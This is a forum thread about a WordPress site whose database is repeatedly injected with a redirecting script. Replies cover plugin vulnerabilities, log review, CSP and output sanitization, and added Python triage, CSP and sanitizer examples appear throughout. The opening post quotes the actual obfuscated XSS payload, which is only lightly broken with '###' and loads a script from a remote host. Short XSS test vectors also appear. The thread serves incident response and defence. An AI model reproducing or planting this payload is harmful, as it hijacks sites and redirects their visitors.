On my server there is one WordPress site that has now several times had scripts injected into its database. The script redirects the browser to some unrelated site; perhaps the cracker wants more traffic to that site or something. Also the WordPress siteurl and home are changed, so the browser goes to that other site. I have changed passwords and commanded users to be careful, but the same thing happened this weekend. Any idea how this injection is done and how it is possible? The code that is injected looks like this (I added those ### so it could not be executed by mistake):

Code:
<img src=x onerror=eval(String.from###CharCode(33,102,117,110,99,116,105,111,110,40,41,123,118,97,114,32,116,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,115,99,114,105,112,116,34,41,59,116,46,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,44,116,46,115,114,99,61,34,104,116,116,112,115,58,47,47,99,108,115,46,98,97,108,97,110,116,102,114,111,109,115,117,110,46,99,111,109,47,99,108,115,46,106,115,63,122,61,50,50,50,38,34,44,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,34,104,101,97,100,34,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,116,41,125,40,41,59))><input autofocus onfocus=eval(String.from###CharCode(33,102,117,110,99,116,105,111,110,40,41,123,118,97,114,32,116,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,115,99,114,105,112,116,34,41,59,116,46,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,44,116,46,115,114,99,61,34,104,116,116,112,115,58,47,47,99,108,115,46,98,97,108,97,110,116,102,114,111,109,115,117,110,46,99,111,109,47,99,108,115,46,106,115,63,122,61,50,50,50,38,34,44,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,34,104,101,97,100,34,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,116,41,125,40,41,59))><svg/onload=eval(String.from###CharCode(33,102,117,110,99,116,105,111,110,40,41,123,118,97,114,32,116,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,34,115,99,114,105,112,116,34,41,59,116,46,116,121,112,101,61,34,116,101,120,116,47,106,97,118,97,115,99,114,105,112,116,34,44,116,46,115,114,99,61,34,104,116,116,112,115,58,47,47,99,108,115,46,98,97,108,97,110,116,102,114,111,109,115,117,110,46,99,111,109,47,99,108,115,46,106,115,63,122,61,50,50,50,38,34,44,100,111,99,117,109,101,110,116,46,103,101,116,69,108,101,109,101,110,116,115,66,121,84,97,103,78,97,109,101,40,34,104,101,97,100,34,41,91,48,93,46,97,112,112,101,110,100,67,104,105,108,100,40,116,41,125,40,41,59))

I created a small program that removes those added strings, but it is a bother to shut down the website and clean the database.
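The injected markup above combines two tricks: an inline event handler (onerror, onfocus, onload) that fires without any script tag, and a String.fromCharCode blob that hides what the handler actually does (here: append a script element pointing at a remote host). The following Python triage script is an added example, not the poster's own cleanup program: it flags post rows carrying that pattern, decodes the character codes so the hidden JavaScript and the remote script URL can be read without executing anything, and checks that the siteurl/home options still point at the site's own host. The sample rows and options are constructed, with a placeholder domain rather than the one from the thread; the row shape assumes a `SELECT ID, post_content FROM wp_posts` result.

```python
import re
from urllib.parse import urlparse

# Two tricks visible in the injected markup: an inline event handler on a tag
# (onerror/onfocus/onload, also after a "/" as in <svg/onload=...>) and a
# String.fromCharCode(...) blob that hides the real JavaScript. The "#*"
# tolerates a deliberately broken "from###CharCode" copy such as the one quoted.
EVENT_HANDLER = re.compile(r"<\s*[a-z][\w-]*[^>]*[\s/]on[a-z]+\s*=", re.IGNORECASE)
FROM_CHARCODE = re.compile(r"String\.from#*CharCode\(([\d,\s]+)\)", re.IGNORECASE)
URL = re.compile(r"https?://[^\s\"']+")


def decode_charcodes(blob: str) -> str:
    """Turn a '104,116,116,112,...' list back into the text it evaluates to."""
    return "".join(chr(int(n)) for n in blob.split(",") if n.strip())


def triage_post(content: str) -> dict:
    """Summarise what an injected post would do, without executing anything."""
    handlers = EVENT_HANDLER.findall(content)
    decoded = [decode_charcodes(m) for m in FROM_CHARCODE.findall(content)]
    urls = sorted({u for js in decoded for u in URL.findall(js)})
    return {
        "suspicious": bool(handlers or decoded),
        "handlers": len(handlers),   # how many tags carry an on*= attribute
        "decoded": decoded,          # the hidden JavaScript, as plain text
        "urls": urls,                # remote scripts it would load
    }


def scan_rows(rows) -> list:
    """rows: (ID, post_content) pairs, e.g. from SELECT ID, post_content FROM wp_posts."""
    return [post_id for post_id, content in rows if triage_post(content)["suspicious"]]


def check_site_urls(options: dict, expected_host: str) -> list:
    """Flag wp_options siteurl/home entries that no longer point at our own host."""
    return [key for key in ("siteurl", "home")
            if urlparse(options.get(key, "")).hostname != expected_host]


# Constructed sample data (not from the thread): the hidden script is built from
# a placeholder domain so the example stays harmless.
HIDDEN_JS = ('!function(){var t=document.createElement("script");'
             't.src="https://example.invalid/cls.js?z=1";'
             'document.head.appendChild(t)}();')
CODES = ",".join(str(ord(c)) for c in HIDDEN_JS)
SAMPLE_ROWS = [
    (1, "<p>Our opening hours have changed.</p>"),
    (2, "<p>Welcome</p>"
        f"<img src=x onerror=eval(String.fromCharCode({CODES}))>"
        f"<svg/onload=eval(String.fromCharCode({CODES}))>"),
]
SAMPLE_OPTIONS = {"siteurl": "https://redirect.example.invalid",
                  "home": "https://blog.example.invalid"}

if __name__ == "__main__":
    for post_id in scan_rows(SAMPLE_ROWS):
        report = triage_post(dict(SAMPLE_ROWS)[post_id])
        print(f"post {post_id}: {report['handlers']} event handlers, loads {report['urls']}")
    print("changed options:", check_site_urls(SAMPLE_OPTIONS, "blog.example.invalid"))
```

Run against a real export, the decoded URLs and the IDs of flagged rows are what you want to keep for the incident record and for matching against the access log; the script never evaluates the decoded text, it only prints it.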
The most likely reason is a vulnerable WP plugin. Check the access.log of the site for unusual requests and scan the website files for malware (just to be sure that nothing got injected into files). In case you did not change the database password yet, change it through ISPConfig and in the wp-config.php file, and chmod the wp-config.php file so that it's only readable for the user of this website and not for others or for the website group.
I told the website creator to install WordFence after the first incident. At least after that the wp-config.php has not been readable by group and others. Reading the access log, it may be that the incident happened on the 5th of October. That is a bit hard to believe; this website is used actively, surely this kind of attack would be discovered the same day. Anyway, reading access logs did not reveal to me any info on how the attack was made. Maybe the user has malware on his/her workstation that does this or steals passwords. I have now again changed all passwords related to this website, including the ISPConfig user password.
Additionally, consider the use of a content security policy (CSP): https://developer.mozilla.org/en-US/docs/Web/HTTP/CSP
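A CSP is worth the effort here because the injected markup needs two things the browser can refuse: executing an inline event handler, and loading a script from a host that is not the site's own. The following Python is an added example, not part of the reply above and not a full CSP implementation: it models only the 'self', 'unsafe-inline', '*' and plain host sources (nonces, hashes and scheme sources are left out on purpose) and evaluates a weak policy next to a strict one. The policies, site origin and remote URL are constructed.

```python
from urllib.parse import urlparse

# Simplified CSP model (added example): it knows 'self', 'unsafe-inline', '*'
# and plain host sources, enough to show why the injected markup needs both
# inline handler execution and a remote script load.


def parse_csp(header: str) -> dict:
    """'default-src 'self'; script-src 'self' cdn.example' -> {directive: [sources]}."""
    policy = {}
    for directive in header.split(";"):
        parts = directive.split()
        if parts:
            policy[parts[0].lower()] = parts[1:]
    return policy


def script_sources(policy: dict):
    """Sources governing scripts; None means the policy does not restrict them."""
    if "script-src" in policy:
        return policy["script-src"]
    if "default-src" in policy:
        return policy["default-src"]
    return None


def allows_inline_script(policy: dict) -> bool:
    """Inline handlers such as onerror=... run only if 'unsafe-inline' is granted
    (nonces and hashes, which can re-enable inline code, are not modelled here)."""
    sources = script_sources(policy)
    return sources is None or "'unsafe-inline'" in sources


def allows_script_from(policy: dict, url: str, own_origin: str) -> bool:
    """Would <script src=url> load on a page served from own_origin?"""
    sources = script_sources(policy)
    if sources is None:
        return True
    target = urlparse(url)
    origin = f"{target.scheme}://{target.netloc}"
    for source in sources:
        if source == "*":
            return True
        if source == "'self'" and origin == own_origin:
            return True
        if source.startswith("*.") and target.hostname and target.hostname.endswith(source[1:]):
            return True
        if source.lower().rstrip("/") in (target.hostname, origin):
            return True
    return False


# Constructed policies: a permissive one that stops nothing, and a strict one.
WEAK_CSP = "default-src *; script-src * 'unsafe-inline'"
STRICT_CSP = "default-src 'self'; script-src 'self'; object-src 'none'"

if __name__ == "__main__":
    site = "https://blog.example.invalid"
    remote = "https://cdn.example.invalid/cls.js?z=1"
    for name, header in (("weak", WEAK_CSP), ("strict", STRICT_CSP)):
        policy = parse_csp(header)
        print(name, "inline handlers:", allows_inline_script(policy),
              "remote script:", allows_script_from(policy, remote, site))
```

The strict policy is the one to aim for; in practice WordPress themes and plugins that rely on inline scripts will need nonces or hashes before 'unsafe-inline' can be dropped, so deploy the header in report-only mode first and watch the violation reports.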
CSP looks interesting. Is there a reason WordPress et al. do not prevent writing <script> in the blog text? Or do not sanitize the blog text when sending it to the website visitor? Could I write a message in this forum with JavaScript embedded and get it executed in visitors' browsers?
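WordPress does filter submitted post content through its wp_kses allowlist, but users holding the unfiltered_html capability (administrators and editors on a single-site install) bypass it, and content written straight into the database by an attacker bypasses it as well. Sanitizing at output time, as the question suggests, closes that gap. The following Python is an added example, not code from WordPress or from this forum, of a small allowlist sanitizer: tags not on the list are dropped (their text is kept), script and style bodies are removed entirely, every attribute not explicitly allowed is dropped (which removes all on*= handlers), href/src values are limited to http, https, mailto and relative URLs, and text is re-escaped. The allowlist and sample input are constructed.

```python
from html import escape
from html.parser import HTMLParser
from urllib.parse import urlparse

# Allowlist (assumption for the example): anything not listed is dropped.
ALLOWED_TAGS = {"p", "br", "a", "em", "strong", "ul", "ol", "li",
                "blockquote", "code", "pre", "img"}
ALLOWED_ATTRS = {"a": {"href", "title"}, "img": {"src", "alt"}}
VOID_TAGS = {"br", "img"}
SAFE_SCHEMES = {"http", "https", "mailto", ""}   # "" covers relative URLs


def safe_url(value) -> bool:
    """Reject javascript:, data: and anything else not in SAFE_SCHEMES."""
    return urlparse((value or "").strip()).scheme.lower() in SAFE_SCHEMES


class Sanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)   # entities decoded, then re-escaped
        self.out = []
        self.skipping = 0   # >0 while inside <script>/<style>: drop their text too

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self.skipping += 1
            return
        if self.skipping or tag not in ALLOWED_TAGS:
            return              # unknown tag dropped; its text content is kept
        kept = ""
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()):
                continue        # this also drops every on*= event handler
            if name in ("href", "src") and not safe_url(value):
                continue
            kept += f' {name}="{escape(value or "", quote=True)}"'
        self.out.append(f"<{tag}{kept}>")

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self.skipping = max(0, self.skipping - 1)
        elif not self.skipping and tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self.skipping:
            self.out.append(escape(data))   # text is always re-escaped


def sanitize(html: str) -> str:
    parser = Sanitizer()
    parser.feed(html)
    parser.close()
    return "".join(parser.out)


# Constructed sample: the same kinds of markup seen in the injected content.
SAMPLE = ('<p>Hello <strong>there</strong></p>'
          '<img src=x onerror=eval(1)><svg/onload=alert(1)>'
          '<script>alert(2)</script>'
          '<a href="javascript:alert(3)" onclick="x()">link</a>')

if __name__ == "__main__":
    print(sanitize(SAMPLE))
```

Applied on the way out, this keeps the harmless markup and leaves the img without its handler, drops the svg and script entirely, and strips the javascript: link, so a payload sitting in the database no longer reaches the visitor's browser. It is a complement to a CSP, not a replacement: the sanitizer decides what HTML leaves the server, the CSP decides what the browser will execute if something slips through.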